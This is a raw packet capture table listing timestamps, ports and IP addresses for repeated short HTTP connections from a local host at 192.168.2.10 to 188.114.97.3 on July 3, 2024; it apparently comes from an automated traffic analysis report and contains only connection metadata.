                                                    Jul 3, 2024 16:42:40.011636019 CEST4975580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:40.016591072 CEST8049755188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:40.369752884 CEST4975580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:40.374882936 CEST8049755188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:40.477041006 CEST8049755188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:40.525877953 CEST4975580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:40.822596073 CEST8049755188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:40.869574070 CEST4975580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:40.950009108 CEST4975580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:40.950406075 CEST4975680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:40.955265999 CEST8049755188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:40.955291986 CEST8049756188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:40.955353022 CEST4975580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:40.955420971 CEST4975680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:40.962743044 CEST4975680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:40.967760086 CEST8049756188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:41.307719946 CEST4975680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:41.314568996 CEST8049756188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:41.429552078 CEST8049756188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:41.478873014 CEST4975680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:41.761842012 CEST8049756188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:41.806984901 CEST4975680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:41.873460054 CEST4975680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:41.873877048 CEST4975780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:41.878859997 CEST8049757188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:41.878948927 CEST4975780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:41.879108906 CEST4975780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:41.879153967 CEST8049756188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:41.879201889 CEST4975680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:41.883976936 CEST8049757188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:41.887316942 CEST4975880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:41.894352913 CEST8049758188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:41.894424915 CEST4975880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:41.894560099 CEST4975880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:41.901452065 CEST8049758188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:42.229017973 CEST4975780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.234153032 CEST8049757188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:42.244633913 CEST4975880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.250379086 CEST8049758188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:42.368227005 CEST8049757188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:42.374855042 CEST8049758188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:42.416299105 CEST4975780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.416347980 CEST4975880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.549978018 CEST4975380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.556168079 CEST4975980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.565320015 CEST8049759188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:42.565382004 CEST4975980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.565844059 CEST4975980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.571711063 CEST8049759188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:42.707231045 CEST8049757188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:42.708854914 CEST4975980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.727539062 CEST4975880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.732168913 CEST8049758188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:42.732255936 CEST4975880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.733424902 CEST8049758188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:42.733475924 CEST4975880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.754707098 CEST8049759188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:42.760070086 CEST4975780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.855001926 CEST4975780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.855880022 CEST4976080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.860419035 CEST8049757188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:42.860518932 CEST4975780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.860755920 CEST8049760188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:42.860830069 CEST4976080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.860985041 CEST4976080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:42.865806103 CEST8049760188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:42.956787109 CEST8049759188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:42.956908941 CEST4975980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:43.213357925 CEST4976080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:43.218813896 CEST8049760188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:43.326652050 CEST8049760188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:43.369477987 CEST4976080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:43.668684959 CEST8049760188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:43.713184118 CEST4976080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:43.790577888 CEST4976180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:43.797107935 CEST8049761188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:43.797177076 CEST4976180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:43.797420979 CEST4976180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:43.803791046 CEST8049761188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:44.150860071 CEST4976180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:44.156023979 CEST8049761188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:44.283164024 CEST8049761188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:44.338206053 CEST4976180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:44.621587992 CEST8049761188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:44.666347027 CEST4976180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:44.744112015 CEST4976180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:44.749511957 CEST8049761188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:44.752410889 CEST4976180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:44.761686087 CEST4976280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:44.768209934 CEST8049762188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:44.768500090 CEST4976280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:44.768712997 CEST4976280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:44.773513079 CEST8049762188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:45.128559113 CEST4976280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:45.133600950 CEST8049762188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:45.243262053 CEST8049762188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:45.291419029 CEST4976280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:45.583950043 CEST8049762188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:45.635124922 CEST4976280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:45.707840919 CEST4976080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:45.715065956 CEST4976280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:45.716031075 CEST4976380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:45.720558882 CEST8049762188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:45.720635891 CEST4976280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:45.721038103 CEST8049763188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:45.721113920 CEST4976380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:45.721298933 CEST4976380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:45.726160049 CEST8049763188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:46.075859070 CEST4976380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:46.080938101 CEST8049763188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:46.169296980 CEST8049763188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:46.213172913 CEST4976380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:46.525403023 CEST8049763188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:46.572556973 CEST4976380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:46.945502043 CEST4976480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:46.951090097 CEST8049764188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:46.951160908 CEST4976480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:46.951354980 CEST4976480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:46.956784964 CEST8049764188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:47.307084084 CEST4976480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:47.312196970 CEST8049764188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:47.428067923 CEST8049764188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:47.478807926 CEST4976480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:47.730129004 CEST4976480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:47.730642080 CEST4976580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:47.735521078 CEST8049764188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:47.735585928 CEST4976480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:47.735685110 CEST8049765188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:47.735750914 CEST4976580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:47.735857010 CEST4976580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:47.741185904 CEST8049765188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:47.868088961 CEST4976680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:47.873051882 CEST8049766188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:47.873277903 CEST4976680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:47.873372078 CEST4976680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:47.878308058 CEST8049766188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:48.088502884 CEST4976580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:48.096931934 CEST8049765188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:48.097266912 CEST8049765188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:48.206337929 CEST8049765188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:48.228888988 CEST4976680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:48.234019041 CEST8049766188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:48.260060072 CEST4976580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:48.323013067 CEST8049766188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:48.369496107 CEST4976680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:48.414809942 CEST8049765188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:48.463174105 CEST4976580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:48.675503016 CEST8049766188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:48.728806019 CEST4976680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:48.801517010 CEST4974380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:48.801583052 CEST4976380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:48.804182053 CEST4976580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:48.804182053 CEST4976680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:48.804996967 CEST4976780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:48.809510946 CEST8049765188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:48.809568882 CEST4976580192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:48.810525894 CEST8049766188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:48.810687065 CEST4976680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:48.810725927 CEST8049767188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:48.810801983 CEST4976780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:48.810914040 CEST4976780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:48.815953016 CEST8049767188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:49.170265913 CEST4976780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:49.175447941 CEST8049767188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:49.256891966 CEST8049767188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:49.306917906 CEST4976780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:49.598372936 CEST8049767188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:49.650712013 CEST4976780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:49.727612972 CEST4976880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:49.732673883 CEST8049768188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:49.736413956 CEST4976880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:49.736592054 CEST4976880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:49.742014885 CEST8049768188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:50.088299036 CEST4976880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:50.093501091 CEST8049768188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:50.180145979 CEST8049768188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:50.228832006 CEST4976880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:50.525412083 CEST8049768188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:50.572577000 CEST4976880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:50.648509979 CEST4976880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:50.649333954 CEST4976980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:50.653688908 CEST8049768188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:50.653738976 CEST4976880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:50.654356956 CEST8049769188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:50.654428005 CEST4976980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:50.654637098 CEST4976980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:50.659625053 CEST8049769188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:51.010195971 CEST4976980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:51.016180038 CEST8049769188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:51.117734909 CEST8049769188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:51.166403055 CEST4976980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:51.483047009 CEST8049769188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:51.525687933 CEST4976980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:51.645303011 CEST4976980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:51.645654917 CEST4977080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:51.650604963 CEST8049769188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:51.650741100 CEST4976980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:51.650907040 CEST8049770188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:51.650969982 CEST4977080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:51.651438951 CEST4977080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:51.656421900 CEST8049770188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:52.010250092 CEST4977080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:52.015227079 CEST8049770188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:52.132659912 CEST8049770188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:52.181982994 CEST4977080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:52.494422913 CEST8049770188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:52.541336060 CEST4977080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:52.618390083 CEST4977080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:52.619082928 CEST4977180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:52.623645067 CEST8049770188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:52.624327898 CEST8049771188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:52.624408960 CEST4977080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:52.624450922 CEST4977180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:52.624691010 CEST4977180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:52.629575014 CEST8049771188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:52.979403019 CEST4977180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:52.984548092 CEST8049771188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:53.098740101 CEST8049771188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:53.150696993 CEST4977180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:53.423744917 CEST4977280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:53.424068928 CEST4977180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:53.428889990 CEST8049772188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:53.429007053 CEST4977280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:53.429064989 CEST4977280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:53.429347992 CEST8049771188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:53.429399967 CEST4977180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:53.433971882 CEST8049772188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:53.593815088 CEST4977380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:53.598718882 CEST8049773188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:53.598794937 CEST4977380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:53.598925114 CEST4977380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:53.603749990 CEST8049773188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:53.775899887 CEST4977280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:53.780874014 CEST8049772188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:53.781302929 CEST8049772188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:53.884541988 CEST8049772188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:53.931967974 CEST4977280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:53.947949886 CEST4977380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:53.952842951 CEST8049773188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:54.104304075 CEST8049772188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:54.110841036 CEST8049773188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:54.150707960 CEST4977280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:54.166313887 CEST4977380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:54.449040890 CEST8049773188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:54.494580984 CEST4977380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:54.572216988 CEST4977280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:54.572463989 CEST4977380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:54.573210955 CEST4977480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:54.577867031 CEST8049772188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:54.577950001 CEST4977280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:54.578028917 CEST8049774188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:54.578114986 CEST4977480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:54.578217983 CEST4977480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:54.580624104 CEST8049773188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:54.580679893 CEST4977380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:54.583060026 CEST8049774188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:54.932209015 CEST4977480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:54.937201977 CEST8049774188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:55.052855015 CEST8049774188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:55.103836060 CEST4977480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:55.412673950 CEST8049774188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:55.463217020 CEST4977480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:55.506344080 CEST8049774188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:55.556941986 CEST4977480192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:55.635802031 CEST4977680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:55.641740084 CEST8049776188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:55.641828060 CEST4977680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:55.641944885 CEST4977680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:55.647838116 CEST8049776188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:55.994710922 CEST4977680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:55.999803066 CEST8049776188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:56.088675022 CEST8049776188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:56.135087967 CEST4977680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:56.473120928 CEST8049776188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:56.525727987 CEST4977680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:56.601336956 CEST4977680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:56.602174997 CEST4977780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:56.606798887 CEST8049776188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:56.606899977 CEST4977680192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:56.607074022 CEST8049777188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:56.607146978 CEST4977780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:56.607271910 CEST4977780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:56.612927914 CEST8049777188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:56.963352919 CEST4977780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:56.968477011 CEST8049777188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:57.054595947 CEST8049777188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:57.103909016 CEST4977780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:57.428008080 CEST8049777188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:57.478919029 CEST4977780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:57.557801962 CEST4977780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:57.558697939 CEST4977880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:57.563360929 CEST8049777188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:57.563491106 CEST4977780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:57.563793898 CEST8049778188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:57.563868999 CEST4977880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:57.563988924 CEST4977880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:57.568829060 CEST8049778188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:57.916486025 CEST4977880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:57.921514988 CEST8049778188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:58.026321888 CEST8049778188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:58.072577000 CEST4977880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:58.369852066 CEST8049778188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:58.416338921 CEST4977880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:58.803695917 CEST4977880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:58.804575920 CEST4977980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:58.809731960 CEST8049778188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:58.810026884 CEST8049779188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:58.810101986 CEST4977880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:58.810133934 CEST4977980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:58.820313931 CEST4977980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:58.825512886 CEST8049779188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:59.120465994 CEST4977980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:59.121309996 CEST4978080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:59.126246929 CEST8049780188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:59.128439903 CEST4978080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:59.128642082 CEST4978080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:59.133833885 CEST8049780188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:59.166696072 CEST8049779188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:59.167093992 CEST8049779188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:59.167227983 CEST4977980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:59.244193077 CEST4978180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:59.249712944 CEST8049781188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:59.252444029 CEST4978180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:59.252626896 CEST4978180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:59.257385015 CEST8049781188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:59.482965946 CEST4978080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:59.487962961 CEST8049780188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:59.488029957 CEST8049780188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:59.574567080 CEST8049780188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:59.604455948 CEST4978180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:59.609369993 CEST8049781188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:42:59.635080099 CEST4978080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:42:59.698293924 CEST8049781188.114.97.3192.168.2.10
